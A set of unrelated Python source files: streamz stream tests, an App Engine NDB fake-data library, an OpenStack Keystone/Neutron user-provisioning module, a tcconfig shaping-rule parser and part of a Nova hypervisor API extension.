L = source.partition(2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 1), (2, 3), (4, 5), (6, 7), (8, 9)]
def test_sliding_window():
source = Stream()
L = source.sliding_window(2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5),
(5, 6), (6, 7), (7, 8), (8, 9)]
@gen_test()
def test_backpressure():
q = Queue(maxsize=2)
source = Stream()
source.map(inc).scan(add, start=0).sink(q.put)
@gen.coroutine
def read_from_q():
while True:
yield q.get()
yield gen.sleep(0.1)
IOLoop.current().add_callback(read_from_q)
start = time()
for i in range(5):
yield source.emit(i)
end = time()
assert end - start >= 0.2
@gen_test()
def test_timed_window():
source = Stream()
a = source.timed_window(0.01)
L = a.sink_to_list()
for i in range(10):
yield source.emit(i)
yield gen.sleep(0.004)
yield gen.sleep(a.interval)
assert L
assert sum(L, []) == list(range(10))
assert all(len(x) <= 3 for x in L)
assert any(len(x) >= 2 for x in L)
yield gen.sleep(0.1)
assert not L[-1]
@gen_test()
def test_timed_window_backpressure():
q = Queue(maxsize=1)
source = Stream()
source.timed_window(0.01).sink(q.put)
@gen.coroutine
def read_from_q():
while True:
yield q.get()
yield gen.sleep(0.1)
IOLoop.current().add_callback(read_from_q)
start = time()
for i in range(5):
yield source.emit(i)
yield gen.sleep(0.01)
stop = time()
assert stop - start > 0.2
def test_sink_to_file():
with tmpfile() as fn:
source = Stream()
with sink_to_file(fn, source) as f:
source.emit('a')
source.emit('b')
with open(fn) as f:
data = f.read()
assert data == 'a\nb\n'
@gen_test()
def test_counter():
source = Counter(interval=0.01)
L = source.sink_to_list()
yield gen.sleep(0.1)
assert L
@gen_test()
def test_rate_limit():
source = Stream()
L = source.rate_limit(0.05).sink_to_list()
start = time()
for i in range(5):
yield source.emit(i)
stop = time()
assert stop - start > 0.2
assert len(L) == 5
@gen_test()
def test_delay():
source = Stream()
L = source.delay(0.02).sink_to_list()
for i in range(5):
yield source.emit(i)
assert not L
yield gen.sleep(0.04)
assert len(L) < 5
yield gen.sleep(0.1)
assert len(L) == 5
@gen_test()
def test_buffer():
source = Stream()
L = source.map(inc).buffer(10).map(inc).rate_limit(0.05).sink_to_list()
start = time()
for i in range(10):
yield source.emit(i)
stop = time()
assert stop - start < 0.01
assert not L
start = time()
for i in range(5):
yield source.emit(i)
stop = time()
assert L
assert stop - start > 0.04
def test_zip():
a = Stream()
b = Stream()
c = sz.zip(a, b)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
b.emit('b')
assert L == [(1, 'a'), (2, 'b')]
d = Stream()
# test zip from the object itself
# zip 3 streams together
e = a.zip(b, d)
L2 = e.sink_to_list()
a.emit(1)
b.emit(2)
d.emit(3)
assert L2 == [(1, 2, 3)]
def test_combine_latest():
a = Stream()
b = Stream()
c = a.combine_latest(b)
d = a.combine_latest(b, emit_on=[a, b])
L = c.sink_to_list()
L2 = d.sink_to_list()
a.emit(1)
a.emit(2)
b.emit('a')
a.emit(3)
b.emit('b')
assert L == [(2, 'a'), (3, 'a'), (3, 'b')]
assert L2 == [(2, 'a'), (3, 'a'), (3, 'b')]
def test_combine_latest_emit_on():
a = Stream()
b = Stream()
c = a.combine_latest(b, emit_on=a)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(2, 'a'), (3, 'a'), (4, 'b')]
def test_combine_latest_emit_on_stream():
a = Stream()
b = Stream()
c = a.combine_latest(b, emit_on=0)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(2, 'a'), (3, 'a'), (4, 'b')]
@gen_test()
def test_zip_timeout():
a = Stream()
b = Stream()
c = sz.zip(a, b, maxsize=2)
L = c.sink_to_list()
a.emit(1)
a.emit(2)
future = a.emit(3)
with pytest.raises(gen.TimeoutError):
yield gen.with_timeout(timedelta(seconds=0.01), future)
b.emit('a')
yield future
assert L == [(1, 'a')]
def test_frequencies():
source = Stream()
L = source.frequencies().sink_to_list()
source.emit('a')
source.emit('b')
source.emit('a')
assert L[-1] == {'a': 2, 'b': 1}
def test_concat():
source = Stream()
L = source.concat().sink_to_list()
source.emit([1, 2, 3])
source.emit([4, 5])
source.emit([6, 7, 8])
assert L == [1, 2, 3, 4, 5, 6, 7, 8]
def test_unique():
source = Stream()
L = source.unique().sink_to_list()
source.emit(1)
source.emit(2)
source.emit(1)
assert L == [1, 2]
def test_unique_key():
source = Stream()
L = source.unique(key=lambda x: x % 2, history=1).sink_to_list()
source.emit(1)
source.emit(2)
source.emit(4)
source.emit(6)
source.emit(3)
assert L == [1, 2, 3]
def test_unique_history():
source = Stream()
s = source.unique(history=2)
L = s.sink_to_list()
source.emit(1)
source.emit(2)
source.emit(1)
source.emit(2)
source.emit(1)
source.emit(2)
assert L == [1, 2]
source.emit(3)
source.emit(2)
assert L == [1, 2, 3]
source.emit(1)
assert L == [1, 2, 3, 1]
def test_union():
a = Stream()
b = Stream()
c = Stream()
L = a.union(b, c).sink_to_list()
a.emit(1)
assert L == [1]
b.emit(2)
assert L == [1, 2]
a.emit(3)
assert L == [1, 2, 3]
c.emit(4)
assert L == [1, 2, 3, 4]
def test_collect():
source1 = Stream()
source2 = Stream()
collector = source1.collect()
L = collector.sink_to_list()
source2.sink(collector.flush)
source1.emit(1)
source1.emit(2)
assert L == []
source2.emit('anything') # flushes collector
assert L == [(1, 2)]
source2.emit('anything')
assert L == [(1, 2), ()]
source1.emit(3)
assert L == [(1, 2), ()]
source2.emit('anything')
assert L == [(1, 2), (), (3,)]
def test_map_str():
def add(x=0, y=0):
return x + y
source = Stream()
s = source.map(add, y=10)
assert str(s) == '<map; func=add>'
def test_filter_str():
def add(x=0, y=0):
return x + y
source = Stream()
s = source.filter(add)
assert str(s) == '<filter; predicate=add>'
def test_timed_window_str():
source = Stream()
s = source.timed_window(.05)
assert str(s) == '<timed_window; interval=0.05>'
def test_partition_str():
source = Stream()
s = source.partition(2)
assert str(s) == '<partition; n=2>'
def test_stream_name_str():
source = Stream(stream_name='this is not a stream')
assert str(source) == '<this is not a stream; Stream>'
def test_zip_latest():
a = Stream()
b = Stream()
c = a.zip_latest(b)
d = a.combine_latest(b, emit_on=a)
L = c.sink_to_list()
L2 = d.sink_to_list()
a.emit(1)
a.emit(2)
b.emit('a')
b.emit('b')
a.emit(3)
assert L == [(1, 'a'), (2, 'a'), (3, 'b')]
assert L2 == [(3, 'b')]
def test_zip_latest_reverse():
a = Stream()
b = Stream()
c = a.zip_latest(b)
L = c.sink_to_list()
b.emit('a')
a.emit(1)
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(1, 'a'), (2, 'a'), (3, 'a'), (4, 'b')]
def test_triple_zip_latest():
from streamz.core import Stream
s1 = Stream()
s2 = Stream()
s3 = Stream()
s_simple = s1.zip_latest(s2, s3)
L_simple = s_simple.sink_to_list()
s1.emit(1)
s2.emit('I')
s2.emit("II")
s1.emit(2)
s2.emit("III")
s3.emit('a')
s3.emit('b')
s1.emit(3)
assert L_simple == [(1, 'III', 'a'), (2, 'III', 'a'), (3, 'III', 'b')]
def test_connect():
source_downstream = Stream()
# connect assumes this default behaviour
# of stream initialization
assert source_downstream.parents == []
assert source_downstream.children == [None]
# initialize the second stream to connect to
source_upstream = Stream()
sout = source_downstream.map(lambda x : x + 1)
L = list()
sout = sout.map(L.append)
source_upstream.connect(source_downstream)
source_upstream.emit(2)
source_upstream.emit(4)
assert L == [3, 5]
| |
# -*- coding: utf-8 -*-
"""
NDB Faker
~~~~~~~~~
NDB Model & Properties for creating entities with fake data.
:license: MIT License, see LICENSE for more details.
:documentation: See README.md for documentation.
"""
__version__ = '1.0'
from google.appengine.ext import ndb
from google.appengine.api import users
import datetime
import hashlib
import random
import uuid
try:
from faker import Faker, numerify, patterns
except ImportError:
raise RuntimeError(
'Faker module required: https://github.com/deepthawtz/faker\n\
This package includes the Faker module as git submodule.\n\
Simply swap the inner "faker" folder with the outer "faker" folder.')
# --------------------------------------------------------------------
# Faker
# --------------------------------------------------------------------
class Faker(Faker):
""" Simply subclassing and adding a few more methods """
phone_number = Faker.phonenumber
address = Faker.street_address
def zip(self):
return int(numerify("#####"))
def ssn(self):
return numerify("###-##-#####")
def website(self):
return 'http://%s.%s' % (patterns.COMPANY_NAME().lower().replace(' ', '-'),
random.choice(['com','net','org']))
def guid(self):
return str(uuid.uuid4())
def md5(self):
return hashlib.md5(str(random.random())).hexdigest()
def sha1(self):
return hashlib.sha1(str(random.random())).hexdigest()
def caption(self):
return self.lorem()[0:64]
def latitude(self):
geo = (random.randint(-180000000, 180000000) / 1000000.0) / 2
return float('%0.2f' % geo)
def longitude(self):
geo = random.randint(-180000000, 180000000) / 1000000.0
return float('%0.2f' % geo)
def coordinates(self):
return ndb.GeoPt('%f,%f' % (self.latitude(), self.longitude()))
def profile(self):
return dict(
first_name = self.first_name(),
last_name = self.last_name(),
username = self.username(),
email = self.email(),
full_address = self.full_address(),
phone_number = self.phone_number(),
)
def user(self):
return users.User(self.email())
def chance(self):
return random.randint(1, 100) <= 50
def integer(self):
return random.randint(1, 1000000)
def float(self):
return random.triangular(1, 10000)
def now(self):
return datetime.datetime.now()
def today(self):
return datetime.date.today()
def timestamp(self):
return datetime.datetime.now().time()
def key(self):
return ndb.Key('Model', random.randint(1, 100000))
# --------------------------------------------------------------------
# Model
# --------------------------------------------------------------------
class Model(ndb.Model):
def __init__(self, *args, **kwds):
self._faker = Faker()
super(Model, self).__init__(*args, **kwds)
@classmethod
def create(cls, **values):
entity = cls(**values)
entity.put()
return entity
@classmethod
def generate(cls, count):
generator = (cls.create() for i in xrange(count))
return [entity for entity in generator]
# --------------------------------------------------------------------
# Base Property
# --------------------------------------------------------------------
class Property(ndb.Property):
def __init__(self, length=1, **kwargs):
try:
self._length = int(length)
except (ValueError, TypeError):
raise ValueError("length must be an integer received %r" % length)
super(Property, self).__init__(**kwargs)
def _get_fake_value(self, entity):
raise NotImplementedError()
def _prepare_for_put(self, entity):
if not self._has_value(entity):
value = self._get_user_value(entity)
if not value:
if self._repeated:
value = [self._get_fake_value(entity) for x in xrange(self._length)]
else:
value = self._get_fake_value(entity)
self._store_value(entity, value)
# --------------------------------------------------------------------
# Fake Property
# --------------------------------------------------------------------
class FakeProperty(Property):
_fake = None
def __init__(self, fake=None, **kwargs):
if fake is not None:
try:
getattr(Faker, fake)
except (TypeError, AttributeError):
raise ValueError("fake must be a valid method of Faker class received %s" % str(fake))
self._fake = fake
super(FakeProperty, self).__init__(**kwargs)
def _get_fake_value(self, entity):
if self._fake:
return getattr(entity._faker, self._fake)()
try:
return getattr(entity._faker, self._name)()
except AttributeError:
return self._get_fallback_value(entity)
def _get_fallback_value(self, entity):
raise NotImplementedError()
# --------------------------------------------------------------------
# Integer Property
# --------------------------------------------------------------------
class IntegerProperty(FakeProperty, ndb.IntegerProperty):
def _get_fallback_value(self, entity):
return entity._faker.integer()
# --------------------------------------------------------------------
# Float Property
# --------------------------------------------------------------------
class FloatProperty(FakeProperty, ndb.FloatProperty):
def _get_fallback_value(self, entity):
return entity._faker.float()
# --------------------------------------------------------------------
# Boolean Property
# --------------------------------------------------------------------
class BooleanProperty(FakeProperty, ndb.BooleanProperty):
def _get_fallback_value(self, entity):
return entity._faker.chance()
# --------------------------------------------------------------------
# Text Property
# --------------------------------------------------------------------
class TextProperty(FakeProperty, ndb.TextProperty):
def _get_fallback_value(self, entity):
return entity._faker.lorem()
# --------------------------------------------------------------------
# String Property
# --------------------------------------------------------------------
class StringProperty(FakeProperty, ndb.StringProperty):
def _get_fallback_value(self, entity):
return entity._faker.caption()
# --------------------------------------------------------------------
# Generic Property
# --------------------------------------------------------------------
class GenericProperty(FakeProperty, ndb.GenericProperty):
def _get_fallback_value(self, entity):
return entity._faker.caption()
# --------------------------------------------------------------------
# Datetime Property
# --------------------------------------------------------------------
class DateTimeProperty(FakeProperty, ndb.DateTimeProperty):
def _get_fallback_value(self, entity):
return entity._faker.now()
# --------------------------------------------------------------------
# Date Property
# --------------------------------------------------------------------
class DateProperty(FakeProperty, ndb.DateProperty):
def _get_fallback_value(self, entity):
return entity._faker.today()
# --------------------------------------------------------------------
# Time Property
# --------------------------------------------------------------------
class TimeProperty(FakeProperty, ndb.TimeProperty):
def _get_fallback_value(self, entity):
return entity._faker.timestamp()
# --------------------------------------------------------------------
# GeoPt Property
# --------------------------------------------------------------------
class GeoPtProperty(FakeProperty, ndb.GeoPtProperty):
def _get_fallback_value(self, entity):
return entity._faker.coordinates()
# --------------------------------------------------------------------
# Key Property
# --------------------------------------------------------------------
class KeyProperty(FakeProperty, ndb.KeyProperty):
def _get_fallback_value(self, entity):
return entity._faker.key()
# --------------------------------------------------------------------
# User Property
# --------------------------------------------------------------------
class UserProperty(FakeProperty, ndb.UserProperty):
def _get_fallback_value(self, entity):
return entity._faker.user()
# --------------------------------------------------------------------
# Json Property
# --------------------------------------------------------------------
class JsonProperty(FakeProperty, ndb.JsonProperty):
def _get_fallback_value(self, entity):
return entity._faker.profile()
# --------------------------------------------------------------------
# Pickle Property
# --------------------------------------------------------------------
class PickleProperty(FakeProperty, ndb.PickleProperty):
def _get_fallback_value(self, entity):
return entity._faker.profile()
# --------------------------------------------------------------------
# Computed Property
# --------------------------------------------------------------------
class ComputedProperty(ndb.ComputedProperty):
pass
# --------------------------------------------------------------------
# Structured Property
# --------------------------------------------------------------------
class StructuredProperty(ndb.StructuredProperty):
pass
# --------------------------------------------------------------------
# Local Structured Property
# --------------------------------------------------------------------
class LocalStructuredProperty(ndb.LocalStructuredProperty):
pass
# --------------------------------------------------------------------
# Blob Property
# --------------------------------------------------------------------
class BlobProperty(ndb.BlobProperty):
def __init__(self, **kwargs):
raise NotImplementedError()
super(BlobProperty, self).__init__(**kwargs)
# --------------------------------------------------------------------
# Blob Key Property
# --------------------------------------------------------------------
class BlobKeyProperty(ndb.BlobKeyProperty):
def __init__(self, **kwargs):
raise NotImplementedError()
super(BlobKeyProperty, self).__init__(**kwargs)
| |
import settings
import uuid
import keystoneclient
from keystoneclient.v3 import client
from datetime import datetime
from neutronclient.v2_0 import client as neutron_client
import logging as log
from flask import current_app
import time
KEYSTONE_PUBLIC_V2_ENDPOINT = settings.KEYSTONE_PUBLIC_ENDPOINT
KEYSTONE_PUBLIC_V2_ENDPOINT = KEYSTONE_PUBLIC_V2_ENDPOINT.replace('/v3','/v2.0')
def write_log(data):
f=open("/tmp/custom.log","a")
f.write(data)
f.close()
def get_client():
"""
"""
keystone = client.Client(token=settings.KEYSTONE_ADMIN_TOKEN,
endpoint=settings.KEYSTONE_ADMIN_ENDPOINT)
return keystone
def get_neutron_client(uname,pwd,tenantname):
"""
"""
try:
neutron = neutron_client.Client(username=uname,password=pwd,auth_url=KEYSTONE_PUBLIC_V2_ENDPOINT,tenant_name=tenantname)
neutron.format= 'json'
except Exception as e:
current_app.logger.exception("Exception in neutron client")
current_app.logger.exception(e)
#neutron = neutron_client.Client(token=settings.KEYSTONE_ADMIN_TOKEN,auth_url=settings.KEYSTONE_PUBLIC_V2_ENDPOINT,tenant_name=tenantname)
return neutron
def _create_user(name, domain=None, project=None, password=None,
email=None, description=None, enabled=None,
default_project=None, keystone=None,
**kwargs):
"""
"""
if not keystone:
keystone = get_client()
user = keystone.users.create(name, domain=None, project=None, password=password,
email=email, description=None, enabled=enabled, default_project=None,
**kwargs)
return user
def create_user(name, password, email=None, description=None, enabled=False, **kwargs):
"""
"""
project = None
user = None
network = None
role_granted = False
neutron = None
keystone = get_client()
_user = get_user_by_name(name)
if _user:
raise keystoneclient.apiclient.exceptions.Conflict("User already exist")
try:
domain = get_default_domain(keystone)
tenant_name = name + '-' + datetime.now().strftime('%Y%m%d%H%M%S')
project = create_project(domain, tenant_name , keystone)
role = get_default_role(keystone)
##SM:domain is optional
user = _create_user(name, domain=domain, project=project, password=password,
email=email, enabled=enabled, keystone=keystone, **kwargs)
##SM:Specify either a domain or project, not both
keystone.roles.grant(role, user=user, domain=None, project=project)
role_granted = True
user = keystone.users.update(user=user.id,enabled=True)
time.sleep(5)
try:
neutron = get_neutron_client(name,password,tenant_name)
except Exception as e:
log.exception("Exception while initializing neutron client")
current_app.logger.exception(e)
try:
if neutron:
network = create_network(neutron,domain.name)
except Exception as e:
current_app.logger.exception(e)
log.exception("Exception while creating network %s"%(str(e)))
user = keystone.users.update(user=user.id,enabled=False)
except Exception as ex:
if role_granted:
keystone.roles.revoke(role, user=user, domain=None, project=project)
if user:
delete_user(user)
if project:
delete_project(project)
if network:
delete_network(neutron,network)
raise ex
return user
def delete_user(id, keystone=None):
if not keystone:
keystone = get_client()
keystone.users.delete(id)
def create_project(domain, name=None, keystone=None):
"""
"""
project = None
if not name:
name = get_unique_project_name()
if not keystone:
keystone = get_client()
project = keystone.projects.create(name, domain)
return project
def create_network(neutron,network_name):
"""
"""
try:
body_sample = {'network': {'name': network_name, 'admin_state_up': True}}
network = neutron.create_network(body=body_sample)
neutron.create_subnet( { 'subnet' : { 'network_id' : network["network"]["id"], 'ip_version' : 4, 'cidr' : '192.168.0.0/24' } } )
ipam_body = {'ipam':{'name': "Default"}}
if "create_ipam" in dir(neutron): #This check is made since dev machines doesnt have contrail installed
neutron.create_ipam(body=ipam_body)
return network
except Exception as e:
current_app.logger.exception(e)
current_app.logger.exception("Exception was raised while creating neutron network")
def delete_project(id, keystone=None):
if not keystone:
keystone = get_client()
keystone.projects.delete(id)
def delete_network(neutron,network):
try:
neutron.delete_network(network["network"]["id"])
except Exception as e:
current_app.logger.exception("Exception while deleting network")
current_app.logger.exception(e)
def get_unique_project_name():
"""
"""
project_name = settings.PROJECT_NAME_PREFIX + uuid.uuid4().hex
while True:
project = get_project_by_name(name=project_name)
if not project:
break
project_name = settings.PROJECT_NAME_PREFIX + uuid.uuid4().hex
return project_name
def get_user_by_name(name, keystone=None):
user = None
if not keystone:
keystone = get_client()
user_list = keystone.users.list(name=name)
if user_list:
user = user_list[0]
return user
def get_user(id, keystone=None):
user = None
if not keystone:
keystone = get_client()
user = keystone.users.get(id)
return user
def get_project_by_name(name=None, project_id=None, keystone=None):
project = None
if not keystone:
keystone = get_client()
project_list = keystone.projects.list(name=name)
if project_list:
project = project_list[0]
return project
def get_default_role(keystone=None):
role = None
if not keystone:
keystone = get_client()
role_list = keystone.roles.list(name=settings.DEFAULT_ROLE_NAME)
if not role_list:
raise Exception("Could not find the default role:%s"%(settings.DEFAULT_ROLE_NAME))
else:
return role_list[0]
def get_default_domain(keystone=None):
"""
"""
domain = None
if not keystone:
keystone = get_client()
domain = [x for x in keystone.domains.list() if x.name in [settings.DEFAULT_DOMAIN_NAME]]
if not domain:
raise Exception("Could not find the default domain:%s"%(settings.DEFAULT_DOMAIN_NAME))
else:
return domain[0]
def enable_user(user_id, keystone=None):
"""
"""
if not keystone:
keystone = get_client()
user = keystone.users.update(user=user_id, enabled=True,
sms_activation_code=None, sms_activation_code_time=None)
return user
def update_user(user, **data):
keystone = get_client()
manager = keystone.users
# v3 API is so much simpler...
user = manager.update(user, **data)
return user
| |
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import copy
from collections import OrderedDict
import subprocrunner
import typepy
from simplesqlite import SimpleSQLite, TableNotFoundError, connect_memdb
from simplesqlite.query import And, Where
from .._common import is_execute_tc_command
from .._const import Tc, TcSubCommand, TrafficDirection
from .._error import NetworkInterfaceNotFoundError
from .._iptables import IptablesMangleController
from .._network import is_anywhere_network
from .._tc_command_helper import get_tc_base_command, run_tc_show
from ._class import TcClassParser
from ._filter import TcFilterParser
from ._model import Filter, Qdisc
from ._qdisc import TcQdiscParser
class TcShapingRuleParser:
@property
def con(self):
return self.__con
@property
def device(self):
return self.__device
@property
def ifb_device(self):
return self.__ifb_device
def __init__(
self,
device,
ip_version,
logger,
tc_command_output,
export_path=None,
is_parse_filter_id=True,
dump_db_path=None,
):
if dump_db_path is None:
self.__con = connect_memdb()
else:
self.__con = SimpleSQLite(dump_db_path, "w")
Filter.attach(self.__con)
Filter.create()
Qdisc.attach(self.__con)
Qdisc.create()
self.__device = device
self.__ip_version = ip_version
self.__tc_command_output = tc_command_output
self.__logger = logger
self.__export_path = export_path
self.clear()
self.__ifb_device = self.__get_ifb_from_device()
self.__iptables_ctrl = IptablesMangleController(True, ip_version)
self.is_parse_filter_id = is_parse_filter_id
def clear(self):
self.__filter_parser = TcFilterParser(self.__con, self.__ip_version)
self.__parsed_mappings = {}
def extract_export_parameters(self):
_, out_rules = self.__get_shaping_rule(self.device)
_, in_rules = self.__get_shaping_rule(self.ifb_device)
for out_rule in out_rules:
out_rule.update(
{Tc.Param.DEVICE: self.device, Tc.Param.DIRECTION: TrafficDirection.OUTGOING}
)
for in_rule in in_rules:
in_rule.update(
{Tc.Param.DEVICE: self.ifb_device, Tc.Param.DIRECTION: TrafficDirection.INCOMING}
)
return (out_rules, in_rules)
def get_tc_parameter(self):
out_rule_maps, _ = self.__get_shaping_rule(self.device)
in_rule_maps, _ = self.__get_shaping_rule(self.ifb_device)
return {
self.device: {
TrafficDirection.OUTGOING: out_rule_maps,
TrafficDirection.INCOMING: in_rule_maps,
}
}
def parse(self):
self.__parse_device(self.device)
self.__parse_device(self.ifb_device)
def __parse_device(self, device):
if not device:
return
if self.__parsed_mappings.get(device):
return
self.__parse_tc_class(device)
self.__parse_tc_filter(device)
self.__parse_tc_qdisc(device)
self.__parsed_mappings[device] = True
def __get_ifb_from_device(self):
if not is_execute_tc_command(self.__tc_command_output):
return None
filter_runner = subprocrunner.SubprocessRunner(
"{:s} show dev {:s} root".format(get_tc_base_command(TcSubCommand.FILTER), self.device),
error_log_level="QUIET",
dry_run=False,
)
if filter_runner.run() != 0 and filter_runner.stderr.find("Cannot find device") != -1:
raise NetworkInterfaceNotFoundError(target=self.device)
return self.__filter_parser.parse_incoming_device(filter_runner.stdout)
def __get_filter_key(self, filter_param):
key_items = OrderedDict()
if Tc.Param.HANDLE in filter_param:
handle = filter_param.get(Tc.Param.HANDLE)
typepy.Integer(handle).validate()
handle = int(handle)
for mangle in self.__iptables_ctrl.parse():
if mangle.mark_id != handle:
continue
key_items[Tc.Param.DST_NETWORK] = mangle.destination
if typepy.is_not_null_string(mangle.source):
key_items[Tc.Param.SRC_NETWORK] = mangle.source
key_items[Tc.Param.PROTOCOL] = mangle.protocol
break
else:
raise ValueError("mangle mark not found: {}".format(mangle))
else:
src_network = filter_param.get(Tc.Param.SRC_NETWORK)
if typepy.is_not_null_string(src_network) and not is_anywhere_network(
src_network, self.__ip_version
):
key_items[Tc.Param.SRC_NETWORK] = src_network
dst_network = filter_param.get(Tc.Param.DST_NETWORK)
if typepy.is_not_null_string(dst_network) and not is_anywhere_network(
dst_network, self.__ip_version
):
key_items[Tc.Param.DST_NETWORK] = dst_network
src_port = filter_param.get(Tc.Param.SRC_PORT)
if typepy.Integer(src_port).is_type():
key_items[Tc.Param.SRC_PORT] = "{}".format(src_port)
elif src_port is not None:
self.__logger.warning(
"expected a integer value for {}, actual {}: {}".format(
Tc.Param.SRC_PORT, type(src_port), src_port
)
)
dst_port = filter_param.get(Tc.Param.DST_PORT)
if typepy.Integer(dst_port).is_type():
key_items[Tc.Param.DST_PORT] = "{}".format(dst_port)
elif src_port is not None:
self.__logger.warning(
"expected a integer value for {}, actual {}".format(
Tc.Param.DST_PORT, type(dst_port)
)
)
protocol = filter_param.get(Tc.Param.PROTOCOL)
if typepy.is_not_null_string(protocol):
key_items[Tc.Param.PROTOCOL] = protocol
key = ", ".join(["{}={}".format(key, value) for key, value in key_items.items()])
return key, key_items
def __get_shaping_rule(self, device):
if typepy.is_null_string(device):
return ({}, [])
self.__parse_device(device)
where_dev_query = Where(Tc.Param.DEVICE, device)
try:
class_params = self.__con.select_as_dict(
table_name=TcSubCommand.CLASS.value, where=where_dev_query
)
except TableNotFoundError:
class_params = []
try:
filter_params = Filter.select(where=where_dev_query)
except TableNotFoundError:
filter_params = []
shaping_rule_mapping = {}
shaping_rules = []
for filter_param in filter_params:
filter_param = filter_param.as_dict()
self.__logger.debug("{:s} param: {}".format(TcSubCommand.FILTER, filter_param))
shaping_rule = {}
filter_key, rule_with_keys = self.__get_filter_key(filter_param)
if typepy.is_null_string(filter_key):
self.__logger.debug("empty filter key: {}".format(filter_param))
continue
qdisc_id = filter_param.get(Tc.Param.FLOW_ID)
if qdisc_id is None:
qdisc_id = filter_param.get(Tc.Param.CLASS_ID)
try:
qdisc_params = Qdisc.select(
where=And([where_dev_query, Where(Tc.Param.PARENT, qdisc_id)])
)
except TableNotFoundError:
qdisc_params = []
for qdisc_param in qdisc_params:
qdisc_param = qdisc_param.as_dict()
self.__logger.debug("{:s} param: {}".format(TcSubCommand.QDISC, qdisc_param))
if self.is_parse_filter_id:
shaping_rule[Tc.Param.FILTER_ID] = filter_param.get(Tc.Param.FILTER_ID)
# shaping_rule[Tc.Param.PRIORITY] = filter_param.get(
# Tc.Param.PRIORITY)
shaping_rule.update(
self.__strip_param(
qdisc_param,
[Tc.Param.DEVICE, Tc.Param.PARENT, Tc.Param.HANDLE, "direct_qlen"],
)
)
for class_param in class_params:
self.__logger.debug("{:s} param: {}".format(TcSubCommand.CLASS, class_param))
if class_param.get(Tc.Param.CLASS_ID) not in (
filter_param.get(Tc.Param.FLOW_ID),
filter_param.get(Tc.Param.CLASS_ID),
):
continue
if self.is_parse_filter_id:
shaping_rule[Tc.Param.FILTER_ID] = filter_param.get(Tc.Param.FILTER_ID)
# shaping_rule[Tc.Param.PRIORITY] = filter_param.get(
# Tc.Param.PRIORITY)
shaping_rule.update(
self.__strip_param(class_param, [Tc.Param.DEVICE, Tc.Param.CLASS_ID])
)
if not shaping_rule:
self.__logger.debug("shaping rule not found for '{}'".format(filter_param))
continue
self.__logger.debug("shaping rule found: {} {}".format(filter_key, shaping_rule))
rule_with_keys.update(shaping_rule)
shaping_rules.append(rule_with_keys)
shaping_rule_mapping[filter_key] = shaping_rule
return (shaping_rule_mapping, shaping_rules)
def __parse_tc_qdisc(self, device):
TcQdiscParser(self.__con).parse(
device, run_tc_show(TcSubCommand.QDISC, device, self.__tc_command_output)
)
def __parse_tc_filter(self, device):
self.__filter_parser.parse(
device, run_tc_show(TcSubCommand.FILTER, device, self.__tc_command_output)
)
def __parse_tc_class(self, device):
TcClassParser(self.__con).parse(
device, run_tc_show(TcSubCommand.CLASS, device, self.__tc_command_output)
)
@staticmethod
def __strip_param(params, strip_params):
work_params = copy.deepcopy(params)
for strip_param in strip_params:
try:
del work_params[strip_param]
except KeyError:
pass
return {key: value for key, value in work_params.items() if value is not None}
| |
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hypervisors admin extension."""
import webob.exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
authorize = extensions.extension_authorizer('compute', 'hypervisors')
def make_hypervisor(elem, detail):
elem.set('hypervisor_hostname')
elem.set('id')
if detail:
elem.set('vcpus')
elem.set('memory_mb')
elem.set('local_gb')
elem.set('vcpus_used')
elem.set('memory_mb_used')
elem.set('local_gb_used')
elem.set('hypervisor_type')
elem.set('hypervisor_version')
elem.set('free_ram_mb')
elem.set('free_disk_gb')
elem.set('current_workload')
elem.set('running_vms')
elem.set('cpu_info')
elem.set('disk_available_least')
service = xmlutil.SubTemplateElement(elem, 'service',
selector='service')
service.set('id')
service.set('host')
class HypervisorIndexTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('hypervisors')
elem = xmlutil.SubTemplateElement(root, 'hypervisor',
selector='hypervisors')
make_hypervisor(elem, False)
return xmlutil.MasterTemplate(root, 1)
class HypervisorDetailTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('hypervisors')
elem = xmlutil.SubTemplateElement(root, 'hypervisor',
selector='hypervisors')
make_hypervisor(elem, True)
return xmlutil.MasterTemplate(root, 1)
class HypervisorTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('hypervisor', selector='hypervisor')
make_hypervisor(root, True)
return xmlutil.MasterTemplate(root, 1)
class HypervisorUptimeTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('hypervisor', selector='hypervisor')
make_hypervisor(root, False)
root.set('uptime')
return xmlutil.MasterTemplate(root, 1)
class HypervisorServersTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('hypervisors')
elem = xmlutil.SubTemplateElement(root, 'hypervisor',
selector='hypervisors')
make_hypervisor(elem, False)
servers = xmlutil.SubTemplateElement(elem, 'servers')
server = xmlutil.SubTemplateElement(servers, 'server',
selector='servers')
server.set('name')
server.set('uuid')
return xmlutil.MasterTemplate(root, 1)
class HypervisorStatisticsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('hypervisor_statistics',
selector='hypervisor_statistics')
root.set('count')
root.set('vcpus')
root.set('memory_mb')
root.set('local_gb')
root.set('vcpus_used')
root.set('memory_mb_used')
root.set('local_gb_used')
root.set('free_ram_mb')
root.set('free_disk_gb')
